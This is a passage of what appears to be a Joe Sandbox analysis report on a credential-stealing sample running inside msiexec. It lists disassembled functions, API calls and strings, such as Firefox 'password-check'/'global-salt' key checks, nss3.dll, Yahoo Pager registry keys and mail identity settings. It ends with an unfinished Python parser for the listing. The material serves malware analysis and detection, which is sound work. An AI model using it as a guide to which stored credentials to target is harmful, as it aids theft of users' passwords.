                                                                            • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                            • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                            • API String ID: 2726666094-3614832568
                                                                            • Opcode ID: 3e9d9b7b28a717fcfc800dd2ec845bb375d33c23d26fbe9b0f9042070bfcc0ea
                                                                            • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                            • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                            APIs
                                                                            • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                              • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                              • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                              • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                            • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                            • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                            • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcmp$memcpy
                                                                            • String ID: global-salt$password-check
                                                                            • API String ID: 231171946-3927197501
                                                                            • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                            • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                            • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                            APIs
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??3@
                                                                            • String ID:
                                                                            • API String ID: 613200358-0
                                                                            • Opcode ID: be2380aa8a20d610938c9a348f674ad3e0c214076fbfa607157327dc7182db63
                                                                            • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                            • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040644F
                                                                            • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                            • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                              • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                              • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                              • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                            • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                            • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                            • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                            • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                              • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy$memset
                                                                            • String ID:
                                                                            • API String ID: 438689982-0
                                                                            • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                            • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                            • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                            APIs
                                                                              • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                            • memset.MSVCRT ref: 0040330B
                                                                            • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                            • strchr.MSVCRT ref: 0040335A
                                                                              • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                            • strlen.MSVCRT ref: 0040339C
                                                                              • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                            • String ID: Personalities
                                                                            • API String ID: 2103853322-4287407858
                                                                            • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                                                            • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                            • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID: winRead
                                                                            • API String ID: 1297977491-2759563040
                                                                            • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                            • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                            • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0044955B
                                                                            • memset.MSVCRT ref: 0044956B
                                                                            • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpymemset
                                                                            • String ID: gj
                                                                            • API String ID: 1297977491-4203073231
                                                                            • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                            • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                            • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                            APIs
                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                            • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                            • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                            • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                            • GetLastError.KERNEL32 ref: 0040C1CA
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Temp$ClipboardDirectoryErrorFileLastNameOpenPathWindows
                                                                            • String ID:
                                                                            • API String ID: 1189762176-0
                                                                            • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                            • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                            • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                            APIs
                                                                            • GetParent.USER32(?), ref: 004090C2
                                                                            • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                            • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Rect$ClientParentPoints
                                                                            • String ID:
                                                                            • API String ID: 4247780290-0
                                                                            • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                            • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                            • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                            APIs
                                                                            • _strcmpi.MSVCRT ref: 0040E134
                                                                            • _strcmpi.MSVCRT ref: 0040E14D
                                                                            • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _strcmpi$_mbscpy
                                                                            • String ID: smtp
                                                                            • API String ID: 2625860049-60245459
                                                                            • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                            • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                            • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040C28C
                                                                            • SetFocus.USER32(?,?), ref: 0040C314
                                                                              • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FocusMessagePostmemset
                                                                            • String ID: S_@$l
                                                                            • API String ID: 3436799508-4018740455
                                                                            • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                            • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                            • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                            APIs
                                                                            • memset.MSVCRT ref: 004092C0
                                                                            • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                            • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                            Strings
                                                                            • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString_mbscpymemset
                                                                            • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                            • API String ID: 408644273-3424043681
                                                                            • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                            • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                            • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscpy
                                                                            • String ID: C^@$X$ini
                                                                            • API String ID: 714388716-917056472
                                                                            • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                            • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                            • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                            APIs
                                                                              • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                              • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                            • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                            • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                            • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                            • String ID: MS Sans Serif
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName_strcmpimemset
                                                                            • String ID: edit
                                                                            APIs
                                                                              • Part of subcall function 004073B3: memset.MSVCRT ref: 004073C1
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433A0
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000020,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433BE
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 004433D9
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443402
                                                                            • ??2@YAPAXI@Z.MSVCRT(00000014,00000000,00000000,0044409F,?,004441FB,?,00000000), ref: 00443426
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: ??2@$memset
                                                                            • String ID:
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0040D2C2
                                                                            • memset.MSVCRT ref: 0040D2D8
                                                                            • memset.MSVCRT ref: 0040D2EA
                                                                            • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                            • memset.MSVCRT ref: 0040D319
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset$memcpy
                                                                            • String ID:
                                                                            APIs
                                                                            Strings
                                                                            • too many SQL variables, xrefs: 0042C6FD
                                                                            • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memset
                                                                            • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                            APIs
                                                                              • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00409E0E
                                                                              • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                            • strlen.MSVCRT ref: 0040B60B
                                                                            • atoi.MSVCRT(?), ref: 0040B619
                                                                            • _mbsicmp.MSVCRT ref: 0040B66C
                                                                            • _mbsicmp.MSVCRT ref: 0040B67F
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                            • String ID:
                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                            • _gmtime64.MSVCRT ref: 00411437
                                                                            • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                            • strftime.MSVCRT ref: 00411476
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                            • String ID:
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: strlen
                                                                            • String ID: >$>$>
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                            • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                            • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID: @
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _strcmpi
                                                                            • String ID: C@$mail.identity
                                                                            APIs
                                                                            • memset.MSVCRT ref: 00444573
                                                                              • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: QueryValuememset
                                                                            • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _ultoasprintf
                                                                            • String ID: %s %s %s
                                                                            APIs
                                                                            • LoadMenuA.USER32(00000000), ref: 00409078
                                                                            • sprintf.MSVCRT ref: 0040909B
                                                                              • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                              • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                              • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                              • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                              • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                              • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                                            • String ID: menu_%d
                                                                            APIs
                                                                            • _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                                                              • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                              • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                                            • _mbscat.MSVCRT ref: 004070FA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: _mbscat$_mbscpystrlen
                                                                            • String ID: sqlite3.dll
                                                                            APIs
                                                                            • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfileString
                                                                            • String ID: A4@$Server Details
                                                                            APIs
                                                                            • strlen.MSVCRT ref: 0040849A
                                                                            • memset.MSVCRT ref: 004084D2
                                                                            • memcpy.MSVCRT(?,00000000,?,?,?,?,679D7B60,?,00000000), ref: 0040858F
                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,679D7B60,?,00000000), ref: 004085BA
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: FreeLocalmemcpymemsetstrlen
                                                                            • String ID:
                                                                            • API String ID: 3110682361-0
                                                                            • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                            • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                                            • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                                            • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                                            APIs
                                                                            • memcpy.MSVCRT(?,?,00000010), ref: 004161F4
                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 00416218
                                                                            • memcpy.MSVCRT(?,?,00000004), ref: 0041623F
                                                                            • memcpy.MSVCRT(?,?,00000008), ref: 00416265
                                                                            Memory Dump Source
                                                                            • Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_11_2_400000_msiexec.jbxd
                                                                            Similarity
                                                                            • API ID: memcpy
                                                                            • String ID:
                                                                            • API String ID: 3510742995-0
                                                                            • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                            • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                                            • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                                            • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8
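The records above are the report's per-function summaries: the API references a function makes (name, module, the argument snapshot the sandbox captured and the address the reference was found at), the memory dump the code was lifted from (here the unpacked image at 0x400000 inside process 11, msiexec), and the similarity hashes used to match the function against other samples. A report of this size carries thousands of such records, so it helps to turn them into structured data. The following is an added Python example, not Joe Sandbox code, that parses this listing format; its input is a constructed, abbreviated copy of two of the records above. The split of the .sdmp name into PID and load base, and the reconstruction of the "API ID" value from the referenced API names, are inferences from this page alone and are labelled as such in the code.

```python
"""Parser for the per-function records of a Joe Sandbox IDA-plugin listing.

Added example, not Joe Sandbox code.  The layout (headers "APIs", "Memory Dump
Source", "Joe Sandbox IDA Plugin", "Similarity", each followed by bullet lines)
is copied from this report; items marked ASSUMED or INFERRED are the author's
reading of the data, not documented Joe Sandbox behaviour.
"""
import re
from typing import Dict, List

HEADERS = {"APIs", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# API line: "• memcpy.MSVCRT(?,00000000,?), ref: 0040858F" or "• strlen.MSVCRT ref: 0040849A"
API_RE = re.compile(r"^•\s*(?P<name>\w+)\.(?P<module>\w+)"
                    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")   # value may be empty

# Constructed sample, abbreviated from this page: a record truncated at the front, then a complete one.
LISTING = """
Memory Dump Source
• Source File: 0000000B.00000002.3283808597.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: PrivateProfileString
• String ID: A4@$Server Details
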